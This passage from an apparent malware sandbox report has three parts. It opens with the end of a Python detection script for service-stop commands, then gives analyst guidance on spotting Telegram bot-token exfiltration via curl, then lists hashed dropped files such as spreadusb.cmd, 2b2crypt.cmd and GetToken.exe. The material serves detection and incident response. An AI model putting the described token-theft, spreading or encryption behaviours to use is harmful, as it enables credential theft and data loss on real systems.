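        stop = NET_STOP_RE.search(ev["cmdline"])
        if stop:
            report["stopped_services"].append(stop["service"])
    return report


if __name__ == "__main__":
    for key, value in scan(SAMPLE_EVENTS).items():
        print(key, "=", sorted(value) if isinstance(value, set) else value)
```

On a live host the same functions take the CommandLine field of Sysmon Event ID 1 or Security 4688 events; the curl line alone is the high-confidence hit, since a full bot token in a process command line has no legitimate reason to exist, and the extracted bot ID and chat_id are what you hand to Telegram for takedown and put on the proxy block list. The discovery and service-stop tags are low-signal on their own but, chained within minutes on one host, confirm the pattern seen here.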
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize: 2KB
MD5: 2f57fde6b33e89a63cf0dfdd6e60a351
SHA1: 445bf1b07223a04f8a159581a3d37d630273010f
SHA256: 3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55
SHA512: 42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize: 1KB
MD5: 8f954c86495f1256b9f20046a0b487d3
SHA1: b40ac4b22b07611c5c34efedca97fc5a8319e9b7
SHA256: 94cf031ea1a632617548db0089091413f4cbb71ce2048e0aab92f6866ab8306b
SHA512: f67333df900d13eef6e01ca6fd2e52efe20a5c85ee6ce43d67f55ef913049149df696e045f45dc614d564afa4b457b365b915dd720b9da369b089ac9cb9b6cea
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize: 64B
MD5: 8c463c0d2e5e09dfe4780a7c68876f45
SHA1: b68c88c25a1cfe0612bb265b6c8436ad7d534da3
SHA256: 305fe1882cc0a2d7a3d182cb8d8f73693993c2ecd680310cb5ca74b45b4376cc
SHA512: 4930a93d84e4a8e024ee2bc83c82cd43674b4c242b5e98d5f8e6a84e0b2b990998dccd9d06962615767fbb5b6bd9633c70b15f197e81da856bba29c18d1791ee
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize: 1KB
MD5: 1dffbab5ecc6d06e8b259ad505a0dc2a
SHA1: 0938ec61e4af55d7ee9d12708fdc55c72ccb090c
SHA256: a9d2e6d35c5e9b94326042c6f2fe7ef381f25a0c02b8a559fc1ee888ccffb18e
SHA512: 93209a16400574416f6f992c2d403acc399179fc911818c4967c9a0211924486878578d1c98ba3bc9e269012603c96ab118a291bf53c57d8af9ab48f9e7b9b76
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize: 1KB
MD5: fe065d0b9f6be1bb97b1a2cdb01bf4c7
SHA1: 0f2e0fd87f0b5b9a44a25d222dd19ac8a97e4bd8
SHA256: c2be5ec0339a1095cc2d207ec107ce8ea80bf2fa6708393faf05f52a1514a008
SHA512: 0e64459fcfe29d67aa23d6687bccfd431e7aa3601b7daf45139a67db5fdfaedb9835b7f37f49e43194b3efa471b3f684fafda950beaa143c9d07ade481181ba4
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize: 1KB
MD5: c9afffd4c93dbf2fc830858e4840ed17
SHA1: ca6303fa16d60486fd08095bb49a073497ed61f2
SHA256: 88e9b5ef68befe59f68f25769adb6af0cd4d8c372ee25a2feec45cb843de804e
SHA512: 614c8ab791f8bfe09cfe6911f8d29da86d023b5b4ec7d103fb5d9517fb5545c9987df78e417293f18aad2c5c180b4e894c5b56857f7952c139721f7380f22802
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize: 64B
MD5: 4f483b4080f0043fa8851faad5fb55c3
SHA1: 75f79addaa55568511c1300782fd8ddb99f8a8e2
SHA256: c2f9c0dc6119b6abedf3a6b5566900b02cdc591f42771cfca5d43313abc38c8f
SHA512: 3f6a689ecfe2a9e4a22959e610c5c698e4856fc86461ce05a3e0aa35fa7994d54de02d2a70945bafe513b59f457d9cae9bac93b1aef7a70da1c6aeaed8dad0bd
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize: 64B
MD5: 446dd1cf97eaba21cf14d03aebc79f27
SHA1: 36e4cc7367e0c7b40f4a8ace272941ea46373799
SHA256: a7de5177c68a64bd48b36d49e2853799f4ebcfa8e4761f7cc472f333dc5f65cf
SHA512: a6d754709f30b122112ae30e5ab22486393c5021d33da4d1304c061863d2e1e79e8aeb029cae61261bb77d0e7becd53a7b0106d6ea4368b4c302464e3d941cf7
-
C:\Users\Admin\Desktop\YcynNote.txt
Filesize: 640B
MD5: b2c26154bdc669017e98aa54c9dc0c49
SHA1: 18985b519126f4f6ca8c2f7db223a2a90dca5612
SHA256: a424f38d0d0dba797c24a6be515a75e6a0fd377e29d52343e67aa7c3e6b80ee8
SHA512: 590178760a6cf734d025664187e257f10ea15520e28a090e16c2985e5a70ab46698d13d2ac5caf7aab4155bb4f3f863c6286f539b8f7e97d87b568f885acbe8d
-
C:\Users\Admin\Desktop\loveletter.vbs
Filesize: 495B
MD5: 900ead69492d80e48738921eca28b14f
SHA1: 6b51607c54f8e734a7ea47091859c3e8dce6365c
SHA256: c1a49c4801603e877e673620c289d709c5c2b368dae72e941f9649889faefab3
SHA512: 8fbb63ea9e5e2bca05bdbcf373056e58aaae2dfd180dfca2fdfdc2b706bb3923798f9878eddf7acef255676eda65f94cc9a827e8abcc9d4da6613f33d74861f2
-
C:\Users\Admin\Desktop\mail.vbs
Filesize: 488B
MD5: 88ef4bc3f48eeb97aedadff8f3840980
SHA1: 48e8167bef2562d902885a075f6190d269fd3d35
SHA256: b62346a7425cfec83d3f05fc4ff268510a16493479f09e7113169aaad5abeefa
SHA512: 523127a83202c86445825e1d8ab84a268e4f9b40a7c76b91b4947fb29de1c0819ba3e856bc1cbd40d6b0d10c04ca356a5e0dc975708a3d765ab425ab1a7d1024
-
C:\Users\Admin\Desktop\spreadusb.cmd
Filesize: 140B
MD5: 591248610b25d51736f91c45f788cf6e
SHA1: b810cf36ed55fa0ea44c2dafb273e2463fbbda56
SHA256: cc1baa061feaf3f747f2d932f077629579f5ce7ec6018bbede7a3220a090a5d1
SHA512: 0cdbe0d5e2f618f9776cc698ca40d028e4cdbc24537179afde3eee08d13921907f34cedb30726858af36f5366d767a19180665053886646a187025e253912b99
-
C:\Users\Admin\Documents\2b2crypt.cmd
Filesize: 138B
MD5: 8a0e18e8c3724921943bd90e6070dc8e
SHA1: 13ba409f261173c093918af6c786fe6d863164cf
SHA256: ac34f2c032a70571a4d51ca8de3c7cee1ba51aadbddb0534fb358e9b312d2ca6
SHA512: 54c9e4aef02fb333c9e0af9dda2b2dbfe8bc9550f127051238d800e1e927e34ce272e457db591bbd6414d1fc703d5185ca557652e508e5dd3211a013cc85e34a
-
C:\Users\Admin\Documents\2b2crypt.m.cmd
Filesize: 142B
MD5: 28057d0514c31373a5e6135b7b477196
SHA1: 719373c153c7a245bdcd6118330e38c15432eb20
SHA256: 3179106c4ec0e5fe5129399101c20d79dc9504f29a6e5fdbb0b507fa75d9a9eb
SHA512: 32952350e35b4ccb6115926ea117d3f8cc49d100a2e47a652f69b5c64f7cf2de2771d9b9b46f6d17cb30162e04022d280fb2d5a54ddd3c396b728623e4692596
-
C:\Users\Admin\Documents\GetToken.exe
Filesize: 8KB
MD5: 2ed86e80ea9b4b95b3e52ed77ea6c401
SHA1: 5032e67b7c84362374b7d52507ab83ae03d7ebff
SHA256: 6ad08fe301caae18941487412e96ceb0b561de4482da25ea4bb8eeb6c1a40983
SHA512: 64fa72aea094f6aa03d9f6dcee3f72ce156a5a7802c39c59af5fc637e72303d46740f0c022fbd4c9f1ec62300ee33cc0af2ac0622729ae67717f580e007e6e71
-
C:\Users\Admin\Documents\NoKeyB.exe
Filesize: 1.2MB
MD5: 6bc9c0340385a1ff2a8dd1b841415211
SHA1: f7b4088b012271ed06c24392bbcb5f9eb75219c2
SHA256: 9df4d035d4d53d22fb29b5288336a05041e85fd448bb20ffe026b61bea52cf13
SHA512: 9bebb00be1fef4e9ac739d4a0ef64a3d8e789cd4d87d9f98fc9813c2b15b84549319275fc6f294a50436fd6843df868b202e40b59ba0081a7a6eda797828fdea
-
C:\Users\Admin\Documents\Tokens.txt
Filesize: 22B
MD5: 3d74b4a3f6053a5a252f4faee7fb157e
SHA1: 576c1a2892dad89c3b6aba698ee67258be827eaf
SHA256: 445f09c32e44ec144320d929de814ceda449da7efa062a19c1cc78cde29fb139
SHA512: dab16b5c564af14fb632f086b99530061d86f54cffed6bfa1b9ae59f97b77beec8ae89c132e2a217d555df512c75bb236921014ac0ff8053c88af16a96db7529
-
C:\Users\Admin\Documents\apps.txt
Filesize: 8KB
MD5: 6bf4cd4f0d7fe6d03030441cc05d10bc
SHA1: cc7017ae89ccd9881675d1374520c73ebfc09ca4
SHA256: d96b64543b6a19c6a9e660950d348f1690486ef2a68879f1694cac46158cb106
SHA512: fac10fd326830c2247497c59e2f6b391eb34c34bef5baa4a9ec12f60a4aa0342a9d18d81afeb0f476077dfbd6cfd9a3ce313b3f6a1dcb6d968a20c9856c4b883
-
C:\Users\Admin\Documents\userdata.txt
Filesize: 32KB
MD5: 819bf2741599fe893802d13bd509d8aa
SHA1: 7962843d92c348e070f247f62f0eabad44b516f4
SHA256: e58d567b78941cf8cf5543c77689270ce00cc2cb2307ce6a63adba7eeddd4692
SHA512: ed2a1f14e87acc16d7e915263be81e90004fd5419372f8a290389b64ac95aa5653cf746ee57282e5a89a8af825ad41d1d77d03e57178454e7acdaa6198cafd54
-
memory/220-160-0x0000000000000000-mapping.dmp
-
memory/372-159-0x0000000000000000-mapping.dmp
-
memory/740-191-0x0000000000000000-mapping.dmp
-
memory/776-172-0x0000000000000000-mapping.dmp
-
memory/836-141-0x0000000000000000-mapping.dmp
-
memory/840-150-0x0000000000000000-mapping.dmp
-
memory/876-189-0x0000000000000000-mapping.dmp
-
memory/1016-217-0x00007FFE184F0000-0x00007FFE18FB1000-memory.dmp
Filesize: 10.8MB
-
memory/1020-165-0x0000000000000000-mapping.dmp
-
memory/1132-183-0x0000000000000000-mapping.dmp
-
memory/1152-184-0x0000000000000000-mapping.dmp
-
memory/1152-214-0x00000269F3670000-0x00000269F3E16000-memory.dmp
Filesize: 7.6MB
-
memory/1152-213-0x00007FFE184F0000-0x00007FFE18FB1000-memory.dmp
Filesize: 10.8MB
-
memory/1252-175-0x0000000000000000-mapping.dmp
-
memory/1296-219-0x00007FFE184F0000-0x00007FFE18FB1000-memory.dmp
Filesize: 10.8MB
-
memory/1332-162-0x0000000000000000-mapping.dmp
-
memory/1384-186-0x0000000000000000-mapping.dmp
-
memory/1388-187-0x0000000000000000-mapping.dmp
-
memory/1460-149-0x0000000000000000-mapping.dmp
-
memory/1508-161-0x0000000000000000-mapping.dmp
-
memory/1516-163-0x0000000000000000-mapping.dmp
-
memory/1520-205-0x00007FFE184F0000-0x00007FFE18FB1000-memory.dmp
Filesize: 10.8MB
-
memory/1552-156-0x0000000000000000-mapping.dmp
-
memory/1560-153-0x0000000000000000-mapping.dmp
-
memory/1792-148-0x0000000000000000-mapping.dmp
-
memory/1836-147-0x0000000000000000-mapping.dmp
-
memory/1868-224-0x00007FFE184F0000-0x00007FFE18FB1000-memory.dmp
Filesize: 10.8MB
-
memory/2028-151-0x0000000000000000-mapping.dmp
-
memory/2040-198-0x0000000000000000-mapping.dmp
-
memory/2044-168-0x0000000000000000-mapping.dmp
-
memory/2096-155-0x0000000000000000-mapping.dmp
-
memory/2260-152-0x0000000000000000-mapping.dmp
-
memory/2340-166-0x0000000000000000-mapping.dmp
-
memory/2432-199-0x0000000000000000-mapping.dmp
-
memory/2476-158-0x0000000000000000-mapping.dmp
-
memory/2700-157-0x0000000000000000-mapping.dmp
-
memory/2780-194-0x0000000000000000-mapping.dmp
-
memory/3244-179-0x0000000000000000-mapping.dmp
-
memory/3292-197-0x0000000000000000-mapping.dmp
-
memory/3316-177-0x0000000000000000-mapping.dmp
-
memory/3344-215-0x0000000000C40000-0x0000000000C48000-memory.dmp
Filesize: 32KB
-
memory/3548-196-0x0000000000000000-mapping.dmp
-
memory/3692-192-0x0000000000000000-mapping.dmp
-
memory/3700-209-0x00007FFE184F0000-0x00007FFE18FB1000-memory.dmp
Filesize: 10.8MB
-
memory/3704-169-0x0000000000000000-mapping.dmp
-
memory/3728-170-0x0000000000000000-mapping.dmp
-
memory/3840-180-0x0000000000000000-mapping.dmp
-
memory/4080-134-0x00007FFE1A080000-0x00007FFE1AB41000-memory.dmp
Filesize: 10.8MB
-
memory/4080-133-0x0000017038D80000-0x0000017038DA2000-memory.dmp
Filesize: 136KB
-
memory/4080-132-0x0000000000000000-mapping.dmp
-
memory/4112-154-0x0000000000000000-mapping.dmp
-
memory/4176-146-0x0000000000000000-mapping.dmp
-
memory/4196-143-0x0000000000000000-mapping.dmp
-
memory/4224-144-0x0000000000000000-mapping.dmp
-
memory/4240-131-0x0000000000000000-mapping.dmp
-
memory/4264-174-0x0000000000000000-mapping.dmp
-
memory/4268-145-0x0000000000000000-mapping.dmp
-
memory/4292-142-0x0000000000000000-mapping.dmp
-
memory/4328-193-0x0000000000000000-mapping.dmp
-
memory/4384-188-0x0000000000000000-mapping.dmp
-
memory/4388-173-0x0000000000000000-mapping.dmp
-
memory/4532-135-0x0000000000000000-mapping.dmp
-
memory/4620-182-0x0000000000000000-mapping.dmp
-
memory/4696-195-0x0000000000000000-mapping.dmp
-
memory/4708-139-0x00007FFE1A010000-0x00007FFE1AAD1000-memory.dmp
Filesize: 10.8MB
-
memory/4708-137-0x0000000000000000-mapping.dmp
-
memory/4720-190-0x0000000000000000-mapping.dmp
-
memory/4820-178-0x0000000000000000-mapping.dmp
-
memory/4868-164-0x0000000000000000-mapping.dmp
-
memory/4888-185-0x0000000000000000-mapping.dmp
-
memory/4924-171-0x0000000000000000-mapping.dmp
-
memory/4936-130-0x0000000000000000-mapping.dmp
-
memory/4948-167-0x0000000000000000-mapping.dmp
-
memory/4996-181-0x0000000000000000-mapping.dmp
-
memory/5008-176-0x0000000000000000-mapping.dmp